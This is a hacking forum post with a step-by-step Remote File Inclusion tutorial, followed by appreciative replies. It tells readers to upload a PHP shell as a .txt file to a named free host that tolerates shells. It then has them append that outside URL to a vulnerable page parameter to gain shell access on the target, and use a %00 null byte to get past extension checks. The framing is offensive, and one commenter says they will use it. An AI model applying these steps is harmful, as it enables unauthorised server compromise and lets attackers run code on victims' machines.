Have an account?
It looks like you're new here. If you want to get involved, click one of these buttons!
Apply for Membership
Who's Online (2)
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Web Application Security
Remote File Inclusion
Remote File Inclusion
Remote File Inclusion is a common attack allowing an attack to include a script from another website, often php shell scripts, to give them shell access to the target server enabling them to compromise the server further. This is vulnerable when a php script include isnt declared correctly. In this tutorial i will be showing how to carry out a Remote File Inclusion attack.
When looking for a Remote file Inclusion vulnerability in a website, you have to find a page that ends in something=4 or something=[string].
Alternatively if you are carrying an RFI from a prewritten exploit you will be given the variable at the end of the url so you dont have to look yourself.
Register a free webhosting account to upload your shell to, i recommend
http://www.7host.com as its fast, free and they allow you to upload shells without closing your account.
IMPORTANT: Upload your file as a .txt file rather than .php or the attack will not work.
Once you have succesfully uploaded your shell, simply add it to the end of the url after the = sign.
www.site.com/page=http://username.7host ... script.txt
Your shell script should now be working as if it were a php file and the RFI attack has been successful.
In this section we will be showing an advanced technique to bypass php filters. In some scripts there is a bit of code:
As you can see it requires .php on the end of the url. You may think you can simply upload the shell as a .php and it will work, but instead this will come up as an error page, so do the same as before will a .txt shell script. But instead add a null byte %00 to the end of the url. For example:
This will be successful and show your shell link because it tells the browser to stop reading after the null byte.
Tutorial written by Xinapse at Firewire-Security.com
I do not give permission to copy this without pming me first.
You must enter a username
Nice tutorial. I will use this.
Appreciate the thanks
Very nice tutorial! good work..! ;)
Good tutorial...I still and always will prefer plain SQL Injections though... :P
Its good to have knowledge of all types of attacks though :)
nice tutorial xinapse! :)
appreciated to ur tuitorial, thanks mate..:)
thank you for you time and for sharing us this tut
Glad you liked it guys :) remember to check out my video tutorials there pretty good
very nice tutorial bro thanks :).................
Thank You :)
Thanks in advance. :)
thanks for sharing this ... but i have a noob question...isnt this RFI? if so, I stands for inclusion or intrusion ????
he has written inclusion and that is correct.
Thanks in advance
Excellent job !
Its good to have knowledge of all types of attacks though. Nice turtorial
Glad you guys liked it :)
thanks man lets see[hr]
thanks man lets see
nice tutorial! good work
Add a Comment